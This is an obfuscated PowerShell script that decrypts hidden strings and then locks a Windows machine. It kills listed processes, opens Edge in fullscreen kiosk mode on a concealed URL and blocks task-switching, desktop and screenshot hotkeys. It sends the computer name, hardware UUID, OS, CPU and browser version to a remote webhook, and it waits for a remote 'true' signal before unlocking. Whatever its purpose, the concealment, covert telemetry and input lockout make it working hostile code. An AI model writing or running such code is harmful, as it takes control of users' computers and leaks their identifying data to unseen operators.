$ErrorActionPreference = "Stop"

Add-Type -AssemblyName System.Windows.Forms

function UEevBgMFfoTJ($title, $text, $duration) {
    $balloon = New-Object System.Windows.Forms.NotifyIcon
    $balloon.Icon = [System.Drawing.SystemIcons]::Warning
    $balloon.BalloonTipTitle = $title
    $balloon.BalloonTipText = $text
    $balloon.Visible = $true
    $balloon.ShowBalloonTip($duration * 1000)
    Start-Sleep -Seconds $duration
    $balloon.Dispose()
}

function fqsZULCfIrIj($link, $title, $color, $fields) {
    $embedBody = @{
        embeds = @(
            @{
                title = $title
                color = $color
                fields = $fields
            }
        )
    } | ConvertTo-Json -Depth 10

    try {
        Invoke-RestMethod -Uri $link -Method Post -ContentType "application/json" -Body $embedBody -ErrorAction Stop | Out-Null
    } catch {}
}

function QeyqFNUDjOaF($reversed, $key) {
    $unreversed = -join ($reversed.ToCharArray() | Sort-Object { [array]::IndexOf($reversed.ToCharArray(), $_) } -Descending)
    $charArr = $reversed.ToCharArray()
    [array]::Reverse($charArr)
    $unreversed = -join $charArr
    $decoded = [System.Convert]::FromBase64String($unreversed)
    $keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
    $result = New-Object byte[] $decoded.Length
    for ($i = 0; $i -lt $decoded.Length; $i++) {
        $result[$i] = $decoded[$i] -bxor $keyBytes[$i % $keyBytes.Length]
    }
    return [System.Text.Encoding]::UTF8.GetString($result)
}

$MOQeROuDXvMU = @("117bee54", "86f79573", "5d0e10e4", "3e77876e", "ebe726e8", "40c02c5d", "10f1c9dd", "0f2ebea2", "001dc37b", "fc2c130a", "460bf50e", "f6846f96", "c53043ba", "980c6b6f", "48530d9d", "90ade4f1", "e09160b1", "77056fc4", "00ebbf46", "d796b5d6", "7d44c925", "21d6802b", "0d5ee79d", "67d122fb", "f4482d82", "92b6881d", "1c19bd8e", "81d46cfd", "8134273b", "7bd984ce", "fe4d1b0c", "1e019096", "7b89a4f7", "9bcfb901", "bc514869", "36c4ff36", "8b575e89", "ef550823", "a38926c5", "168e0d2e", "976a7cc0", "953559b2", "49426705", "a8f1cd1a", "f308a21f", "11269740", "19762c61", "83d71441", "4e494e1a", "b707adde", "824771ef", "584e04e4", "543fb96e", "be7c4ec4", "c3bff0c8", "6422cc9d", "a802937d", "4ca13966", "2dab0ad3", "73b19d4a", "25b0829b", "216151fd", "0330f25c", "c9136e65", "eaf9084a", "2b818984", "25b9c87c", "a2335489", "46a15a9d", "d13a6089", "336b428a", "51e16265", "f945a82c", "3097628a", "e2cf96ec", "2a17037b", "8d9eb2ed", "9c0fda33", "4eba17b9", "0a72a461", "ddfc96fb", "b4e5599e", "4ac0bd67", "34833f1e", "c0dc44b1", "ac50aa9c", "223d6706", "9719f460", "e5a25de9", "8cdc778c", "3189d6ff", "3550611d")
    $ofLzCmuLuwUm = -join @($MOQeROuDXvMU[77], $MOQeROuDXvMU[47], $MOQeROuDXvMU[49], $MOQeROuDXvMU[65])
    $MkGGsYzxLCRf = -join @($MOQeROuDXvMU[81], $MOQeROuDXvMU[20], $MOQeROuDXvMU[56], $MOQeROuDXvMU[37])
    $MspFNqkhQfcA = -join @($MOQeROuDXvMU[51], $MOQeROuDXvMU[7], $MOQeROuDXvMU[13], $MOQeROuDXvMU[90])
    $BZJIZbqZXULg = -join @($MOQeROuDXvMU[43], $MOQeROuDXvMU[17], $MOQeROuDXvMU[36], $MOQeROuDXvMU[8])
    $wwiboRreVUid = -join @($MOQeROuDXvMU[32], $MOQeROuDXvMU[24], $MOQeROuDXvMU[5], $MOQeROuDXvMU[58])
    $OwdBDBqxVqEX = -join @($MOQeROuDXvMU[3], $MOQeROuDXvMU[40], $MOQeROuDXvMU[6], $MOQeROuDXvMU[25])
    $xanCiPzEpoID = -join @($MOQeROuDXvMU[84], $MOQeROuDXvMU[67], $MOQeROuDXvMU[14], $MOQeROuDXvMU[44])
    $DWyMZWViMrEp = -join @($MOQeROuDXvMU[48], $MOQeROuDXvMU[0], $MOQeROuDXvMU[2], $MOQeROuDXvMU[9])
    $EwNEgjFGrovj = -join @($MOQeROuDXvMU[30], $MOQeROuDXvMU[31], $MOQeROuDXvMU[16], $MOQeROuDXvMU[18])
    $WNvnwHkBioPj = -join @($MOQeROuDXvMU[70], $MOQeROuDXvMU[60], $MOQeROuDXvMU[15], $MOQeROuDXvMU[76])
    $qHqfpwUWcHdn = -join @($MOQeROuDXvMU[22], $MOQeROuDXvMU[79], $MOQeROuDXvMU[87], $MOQeROuDXvMU[68])
    $WEpqbGArvmTt = -join @($MOQeROuDXvMU[45], $MOQeROuDXvMU[62], $MOQeROuDXvMU[34], $MOQeROuDXvMU[52])
    $znQgfNDuvjXP = -join @($MOQeROuDXvMU[74], $MOQeROuDXvMU[4], $MOQeROuDXvMU[88], $MOQeROuDXvMU[33])
    $QCfUJWVoAPPP = -join @($MOQeROuDXvMU[82], $MOQeROuDXvMU[71], $MOQeROuDXvMU[29], $MOQeROuDXvMU[78])
    $nQnlhDdwINVN = -join @($MOQeROuDXvMU[63], $MOQeROuDXvMU[69], $MOQeROuDXvMU[38], $MOQeROuDXvMU[64])
    $KHFAbXDaYWeT = -join @($MOQeROuDXvMU[21], $MOQeROuDXvMU[28], $MOQeROuDXvMU[55], $MOQeROuDXvMU[50])
    $AGNLuHdAhxWx = -join @($MOQeROuDXvMU[23], $MOQeROuDXvMU[89], $MOQeROuDXvMU[53], $MOQeROuDXvMU[1])
    $FRFVGBpWzoFt = -join @($MOQeROuDXvMU[41], $MOQeROuDXvMU[54], $MOQeROuDXvMU[80], $MOQeROuDXvMU[66])
    $WvEJpGgETvaQ = -join @($MOQeROuDXvMU[19], $MOQeROuDXvMU[85], $MOQeROuDXvMU[11], $MOQeROuDXvMU[26])
    $izZwlxbYHmdm = -join @($MOQeROuDXvMU[59], $MOQeROuDXvMU[27], $MOQeROuDXvMU[12], $MOQeROuDXvMU[39])
    $cCUhHUJMhzkH = -join @($MOQeROuDXvMU[10], $MOQeROuDXvMU[75], $MOQeROuDXvMU[61], $MOQeROuDXvMU[46])
    $mcZeJsbZdsgV = -join @($MOQeROuDXvMU[91], $MOQeROuDXvMU[35], $MOQeROuDXvMU[83], $MOQeROuDXvMU[72])
    $XdoIZsSrfxqE = -join @($MOQeROuDXvMU[73], $MOQeROuDXvMU[86], $MOQeROuDXvMU[57], $MOQeROuDXvMU[42])

$WzSOlgohPDFj = "XRwWNwwCEslVHwwWK4wSMg1UZYwXBt1QQ1hUPxBHbdhFEdRU"
$LJrBnyLfxZBo = "==QMg03CrREdBRhAdFHMHBWSdRFVaRlc/w3UC1GAWZgAkgQD9BFX5dUfCQgQIAxXjVxZ/EwCaV0MldwfHoXZMJUDPkgWXZBBEoAVHAADXdgBVdQXKswACEVBNBUWX9VXXNgEL51QY1RXXJwGWtEDXdUDTpkFDYURRAkC"
$xEbTFlYAovfq = "==AEKFVXYVwVOQHTeFFWf5EBNdxVW0VVx0FRLU3FYlQBYAxVdVUXJUFETBRRaxkWVwQBLV0BCthSOMUFAxUX"
$lNpZKFsTRrAV = "==wQF1UWRYGGbtQWZx0BZcUVHpFAl1wFfdyFM0AVdchCURkXWt1FQREQA0EXX8QUbckVF5kHeBRQSwUC"
$NDdsMgFsvJkU = "=wjEHwwCAxgVBJBHBFlRXh0CQgBGW4BWAE1EQ5FQX8hRTUFEOggQcAVQSwRQVJ0UKZAEYghFCUUCXJBU8BEb"
$QaqOKRoOQAvc = "==AEWd1XREEXXQ0QZg1EBFBVGcRRAIERZYxVfhRRSZhZ"
$WKDeVNrYaMuC = "UZVQZFVUbRBTfF1WSIUDERREBMkN"
$LVEoppboToZl = "HoFU/FUQKAkUHBAc"
$hcmFVzQBWhfx = "==AI9JjL"
$AtoSGLrbIpLf = "X1VUDBBUkF0SFtlBYpFZ"
$cossrGMklfey = "gRzc"
$sgakcoQLkkbD = "exlWDJUUhlxUVVFd"
$ElZXRKMTTnBJ = "==gRFRgF2M0CZBVFQclN"
$GbqWBpDrmsGB = "=IkRwVUVbJUWWUQVR4gc"
$IhTMmzhpxLsQ = "==gVcB1N"
$XXecpzfDRsEN = "==gVVNVVL0Fc"
$iuKPVStMFxCw = "==gFMplQElhUOIEGZxwFSN0UAYBERtFXAUwDaJ0AANVERg1b"
$eZDZJBSrvOTH = "AEATC41DLAhV3IBDWxlRABla"
$ESfcrvEQubjt = "==AGKo1CFpkUXUUVFoBXRQwXf1FCzRhFSNwFaRQFVF1QPkVDBNgWW5lM"
$RKlHiJDhvcop = "=w0VRRkVZNRCJAgFNBAUdNBWFkBXDskc"
$inMOyrsxmIds = "QFgBVVUW"
$ZyNByrQxjvWs = "==wULFwHUFFVQZkX"
$MfJdtcwdqUlQ = "Bs0VcMRXAl1WJhkV"

try {
    $asQglOabSbKf = QeyqFNUDjOaF $WzSOlgohPDFj $ofLzCmuLuwUm
    $UvuwxnfsUrsj = QeyqFNUDjOaF $LJrBnyLfxZBo $MkGGsYzxLCRf
    $qgiawtsxpwhg = QeyqFNUDjOaF $xEbTFlYAovfq $MspFNqkhQfcA
    $EnYVzCRfVNzD = QeyqFNUDjOaF $lNpZKFsTRrAV $BZJIZbqZXULg
    $yNVxBhGjtFlM = QeyqFNUDjOaF $NDdsMgFsvJkU $wwiboRreVUid
    $ZrluUpGMVKCm = QeyqFNUDjOaF $QaqOKRoOQAvc $OwdBDBqxVqEX
    $qFaRlJRyCxOv = QeyqFNUDjOaF $WKDeVNrYaMuC $xanCiPzEpoID
    $fXnoRbcmpTxV = QeyqFNUDjOaF $LVEoppboToZl $DWyMZWViMrEp
    $SRkVPdMHqTsC = QeyqFNUDjOaF $hcmFVzQBWhfx $EwNEgjFGrovj
    $fRmtQiNdynIH = QeyqFNUDjOaF $AtoSGLrbIpLf $WNvnwHkBioPj
    $KHxsvnrFmzda = QeyqFNUDjOaF $cossrGMklfey $qHqfpwUWcHdn
    $RXupAQuOguyu = QeyqFNUDjOaF $sgakcoQLkkbD $WEpqbGArvmTt
    $loOmtWnCDphi = QeyqFNUDjOaF $ElZXRKMTTnBJ $znQgfNDuvjXP
    $eTYfiYkBoylH = QeyqFNUDjOaF $GbqWBpDrmsGB $QCfUJWVoAPPP
    $hmKDGNgjXErc = QeyqFNUDjOaF $IhTMmzhpxLsQ $nQnlhDdwINVN
    $sFhEKRQOJouD = QeyqFNUDjOaF $XXecpzfDRsEN $KHFAbXDaYWeT
    $cyljPlDVpJXd = QeyqFNUDjOaF $iuKPVStMFxCw $AGNLuHdAhxWx
    $eADsYASCXxPt = QeyqFNUDjOaF $eZDZJBSrvOTH $FRFVGBpWzoFt
    $EVvRwfETdoFB = QeyqFNUDjOaF $ESfcrvEQubjt $WvEJpGgETvaQ
    $IkioaLvPBfld = QeyqFNUDjOaF $RKlHiJDhvcop $izZwlxbYHmdm
    $UllZETXmnLxm = QeyqFNUDjOaF $inMOyrsxmIds $cCUhHUJMhzkH
    $WhUulhNQZpKX = QeyqFNUDjOaF $ZyNByrQxjvWs $mcZeJsbZdsgV
    $kRiXQVcEVqtI = QeyqFNUDjOaF $MfJdtcwdqUlQ $XdoIZsSrfxqE
    $yNVxBhGjtFlM = $yNVxBhGjtFlM | ConvertFrom-Json
} catch { exit 1 }


$IoOLBOVKGFAc = (Get-CimInstance -Class Win32_ComputerSystemProduct).UUID
try {
    $BFuRwOmkqyNF = (Invoke-WebRequest -Uri $qgiawtsxpwhg -UseBasicParsing -ErrorAction Stop).Content
} catch { exit 1 }

if ($BFuRwOmkqyNF -match $IoOLBOVKGFAc) {
    UEevBgMFfoTJ $sFhEKRQOJouD $cyljPlDVpJXd 10
    exit 0
}

try {
    $FHhtMnWilZQk = (Invoke-WebRequest -Uri $EnYVzCRfVNzD -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
} catch { exit 1 }

if ($FHhtMnWilZQk -eq "true") {
    Write-Host $IkioaLvPBfld
    exit 0
}

foreach ($UBYyAhVpCxrM in $yNVxBhGjtFlM) {
    if ($UBYyAhVpCxrM -notmatch "\.exe`$") {
        $UBYyAhVpCxrM = "$UBYyAhVpCxrM.exe"
    }
    taskkill /F /IM $UBYyAhVpCxrM /T 2>&1 | Out-Null
}

taskkill /F /IM $kRiXQVcEVqtI /T 2>&1 | Out-Null

Start-Process $WhUulhNQZpKX "--kiosk `"$asQglOabSbKf`" --edge-kiosk-type=fullscreen --no-first-run"

Start-Sleep -Seconds 3

$nhhABorutQlP = @"
using System;
using System.Runtime.InteropServices;
public class KeyBlock {
    [DllImport("user32.dll")]
    public static extern bool RegisterHotKey(IntPtr hWnd, int id, uint fsModifiers, uint vk);
    [DllImport("user32.dll")]
    public static extern bool UnregisterHotKey(IntPtr hWnd, int id);
    [DllImport("user32.dll")]
    public static extern IntPtr GetForegroundWindow();
    [DllImport("user32.dll", SetLastError=true)]
    public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint processId);
    [DllImport("user32.dll")]
    public static extern bool SetForegroundWindow(IntPtr hWnd);

    private const uint MOD_ALT = 0x0001;
    private const uint MOD_CONTROL = 0x0002;
    private const uint MOD_WIN = 0x0008;

    public static void BlockKeys() {
        RegisterHotKey(IntPtr.Zero, 1, MOD_ALT, 0x09);
        RegisterHotKey(IntPtr.Zero, 2, MOD_ALT | MOD_CONTROL, 0x09);
        RegisterHotKey(IntPtr.Zero, 3, MOD_WIN, 0x44);
        RegisterHotKey(IntPtr.Zero, 4, MOD_WIN, 0x09);
        RegisterHotKey(IntPtr.Zero, 5, MOD_ALT, 0x73);
        RegisterHotKey(IntPtr.Zero, 6, MOD_CONTROL, 0x1B);
        RegisterHotKey(IntPtr.Zero, 7, MOD_WIN, 0x45);
        RegisterHotKey(IntPtr.Zero, 8, MOD_WIN, 0x52);
        RegisterHotKey(IntPtr.Zero, 9, MOD_ALT, 0x1B);
        RegisterHotKey(IntPtr.Zero, 10, MOD_WIN, 0x4C);
        RegisterHotKey(IntPtr.Zero, 11, 0, 0x2C);
        RegisterHotKey(IntPtr.Zero, 12, MOD_WIN, 0x2C);
        RegisterHotKey(IntPtr.Zero, 13, MOD_ALT, 0x2C);
    }

    public static void UnblockKeys() {
        for (int i = 1; i <= 13; i++) {
            UnregisterHotKey(IntPtr.Zero, i);
        }
    }
}
"@

try {
    Add-Type -TypeDefinition $nhhABorutQlP -ErrorAction Stop
} catch { }

[KeyBlock]::BlockKeys()

$DISFVyvRmdEn = $env:COMPUTERNAME
$HDBhAgAeOYFM = (Get-CimInstance -Class Win32_OperatingSystem).Caption
$ygFCIUTFwkVi = (Get-CimInstance -Class Win32_Processor).Name
$tbtkEfWWcdNU = (Get-Item "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
if (-not $tbtkEfWWcdNU) {
    $tbtkEfWWcdNU = (Get-Item "C:\Program Files\Microsoft\Edge\Application\msedge.exe" -ErrorAction SilentlyContinue).VersionInfo.ProductVersion
}
if (-not $tbtkEfWWcdNU) { $tbtkEfWWcdNU = "Unknown" }
$asxEyRURSSRR = Get-Date -Format "HH:mm:ss | dd/MM/yyyy"

$EQXbXxUDRFTu = @(
    @{ name = $fXnoRbcmpTxV; value = $DISFVyvRmdEn; inline = $true }
    @{ name = $SRkVPdMHqTsC; value = $IoOLBOVKGFAc; inline = $true }
    @{ name = $fRmtQiNdynIH; value = $HDBhAgAeOYFM; inline = $false }
    @{ name = $KHxsvnrFmzda; value = $ygFCIUTFwkVi; inline = $false }
    @{ name = $RXupAQuOguyu; value = $tbtkEfWWcdNU; inline = $true }
    @{ name = $loOmtWnCDphi; value = $asxEyRURSSRR; inline = $true }
)
fqsZULCfIrIj $UvuwxnfsUrsj $ZrluUpGMVKCm 3066993 $EQXbXxUDRFTu

$global:GVyLBNewugEL = $true

$yuxqeGmsDMVV = Start-Job -ScriptBlock {
    param($url)
    while ($true) {
        try {
            $FwtNyUnqekWj = (Invoke-WebRequest -Uri $url -UseBasicParsing -ErrorAction Stop).Content.Trim().ToLower()
            if ($FwtNyUnqekWj -eq "true") {
                return "completed"
            }
        } catch {}
        Start-Sleep -Seconds 20
    }
} -ArgumentList $EnYVzCRfVNzD

while ($global:GVyLBNewugEL) {
    if ($yuxqeGmsDMVV.State -eq "Completed") {
        $condition = Receive-Job -Job $yuxqeGmsDMVV
        if ($condition -eq "completed") {
            [KeyBlock]::UnblockKeys()
            taskkill /F /IM $WhUulhNQZpKX /T 2>&1 | Out-Null
            Start-Process $kRiXQVcEVqtI
            $global:GVyLBNewugEL = $false
            break
        }
    }

    $mYYBnoHhveHy = [KeyBlock]::GetForegroundWindow()
    $pqTWgrTCmzWa = 0
    [KeyBlock]::GetWindowThreadProcessId($mYYBnoHhveHy, [ref]$pqTWgrTCmzWa) | Out-Null
    $SnMApwzDGjcB = $null
    try { $SnMApwzDGjcB = Get-Process -Id $pqTWgrTCmzWa -ErrorAction Stop } catch {}

    if ($SnMApwzDGjcB -and $SnMApwzDGjcB.ProcessName -ne $UllZETXmnLxm) {
        $AmYTamgyllNB = @(
            @{ name = $fXnoRbcmpTxV; value = $DISFVyvRmdEn; inline = $true }
            @{ name = $SRkVPdMHqTsC; value = $IoOLBOVKGFAc; inline = $true }
            @{ name = $eTYfiYkBoylH; value = $SnMApwzDGjcB.ProcessName; inline = $false }
            @{ name = $hmKDGNgjXErc; value = (Get-Date -Format "HH:mm:ss | dd/MM/yyyy"); inline = $false }
        )
        fqsZULCfIrIj $UvuwxnfsUrsj $qFaRlJRyCxOv 15158332 $AmYTamgyllNB

        UEevBgMFfoTJ $eADsYASCXxPt $EVvRwfETdoFB 5

        [KeyBlock]::UnblockKeys()
        taskkill /F /IM $WhUulhNQZpKX /T 2>&1 | Out-Null
        Start-Process $kRiXQVcEVqtI
        
        $global:GVyLBNewugEL = $false
        break
    }

    Start-Sleep -Milliseconds 500
}

[KeyBlock]::UnblockKeys()
Stop-Job -Job $yuxqeGmsDMVV -ErrorAction SilentlyContinue
Remove-Job -Job $yuxqeGmsDMVV -Force -ErrorAction SilentlyContinue
Get-Job | Where-Object { $_.State -ne "Running" } | Remove-Job -Force -ErrorAction SilentlyContinue
